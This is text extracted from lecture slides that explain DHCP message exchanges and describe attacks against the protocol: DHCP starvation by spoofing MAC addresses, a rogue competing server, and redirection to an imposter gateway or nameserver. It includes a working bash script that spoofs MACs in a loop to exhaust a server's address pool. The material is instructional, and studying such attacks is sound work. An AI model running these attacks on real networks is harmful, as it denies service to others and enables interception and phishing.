Using the DHCP protocol for a denial-of

Using the DHCP protocol for a denial-of of-service attack David Morgan Denial of service stategy against a DHCP server server issues IP addresses per MAC addresses administers a fixed pool of IPs stops issuing when it runs out perhaps we can artificially make it run out 1

DHCP protocol conversations how IPs are provided sequence of 4 message types discover from client ethernet broadcast offer from server to client request from client to server acknowledgment from server to client Initial dhcp server on D others lack IP addresses /var/lib/dhcpd/dhcpd.leases if linux dhcp leases: 01 is free 02 is free 03 is free 2

B broadcasts discover I need an IP; my MAC is. Can somebody help? D sends offer if it runs a dhcp server program How about 01? You want that? 3

B sends D request for what was offered Yes please. I want to use 01. D sends B acknowlegement All right then, please go ahead; 01 is yours to use. 4

B uses it, D records it 01 ifconfig eth0 01 has 01 02 is free 03 is free C broadcasts discover 01 I need an IP; my MAC is. Can somebody help? 5

D sends offer 01 How about 02? You want that? C sends D request for what was offered 01 4 Yes please. I want to use 02. 6

D sends C acknowlegement 01 All right then, please go ahead; 02 is yours to use. C uses it, D records it 01 02 ifconfig eth0 02 has 01 has 02 03 is free 7

E broadcasts discover 01 02 I need an IP; my MAC is. Can somebody help? D sends offer 01 02 How about 03? You want that? 8

E sends D request for what was offered 01 02 Yes please. I want to use 03. D sends E acknowlegement 01 02 All right then, please go ahead; 03 is yours to use. 9

E uses it, D records it 01 02 03 has 01 has 02 has 03 ifconfig eth0 02 A broadcasts discover 01 02 03 I need an IP; my MAC is. Can somebody help? 10

D sends no offer (nor anything) 01 02 03 I already gave away all 3 addresses. None left. Too bad I can t help him. DHCP serves more than addresses routers gateway for non-local destination IPs nameservers where to find out names IPs other stuff 11

D sends B more stuff, B implements/adopts it all Please go ahead your IP: 01 your router: your nameserver: 66.207.15.100 ifconfig eth0 01 route add default gw echo nameserver 66.207.15.100 >> /etc/resolv.conf Now for unreasonable distortions 1. a single machine can consume all server s IPs 2. a machine can run a competing dhcp server 3. a dhcp server can misdirect hosts to imposters gateways name servers 12

Unreasonable distortion #1 consuming all the IPs anybody can get an IP from a server server just needs your MAC spoof a lot of MACs, request an IP for each until server is run out of business Unreasonable distortion #1: exhausting server s s IP pool I need an IP, and my MAC is FF:FF:00:00:00:55 I need an IP, and my MAC is 00:00:FF:12:34:56 I need an IP, and my MAC is 66:BB:CC:11:11:11 13

D obliges itself out of IPs 03 00:00:FF:12:34:56 0. 1 0 1 0. 1 0 2 FF:FF:00:00:00:55 has 01 66:BB:CC:11:11:11 has 02 00:00:FF:12:34:56 has 03 MAC spoof in linux ifconfig eth0 hw ether 11:22:33:44:55:66 server will give you different IPs as long as you present distinct MACs pseudo-code: loop end loop assume new MAC request another IP 14

Unreasonable distortion #2: a competing dhcp server 10.0.0.2 You can take 192.168.1.199. OK?? who wins?? How about 03? You want that? You gotta be quick, gunslinger! indeterminate might depend on planetary alignment but speed helps a lot 15

B beats out real server D if B is faster outside B s control D is prevented by prior denial of service attack under B s control please see unreasonable distortion #1 Unreasonable distortion #3 downstream misdirection tell hosts to use an imposter router routers forward the imposter router could sniff while forwarding tell hosts to use an imposter nameserver nameservers redirect the imposter nameserver can direct to wherever wherever could phish and phake and phrolic 16

Run on client to implement dos clear interface="eth0" for i in 0 1 2 3 4 5 6 7 8 9 F do number=$random; j=$[number %= 10] number=$random; k=$[number %= 10] mac="aa:bb:cc:$i$i:$j$j:$k$k" ifconfig $interface down echo -e "\n\ninterface's current addresses:" ifconfig eth0 grep -E "HWaddr inet addr" echo -en "\n --> Press key to request IP for bogus MAC: $mac \n" read ifconfig $interface hw ether $mac ifconfig $interface up killall dhclient;sleep 1 dhclient $interface done Run on server to observe watch 'grep -E "lease hardware" /var/lib/dhcpd/dhcpd.leases grep -v \#;echo -n -e "\nnumber of outstanding leases: "; grep "lease 10" /var/lib/dhcpd/dhcpd.leases sort uniq wc -l' 17

Please see Flaws within the Dynamic Host Configuration Protocol http://www.networkpenetration.com/dhcp_flaws.html 18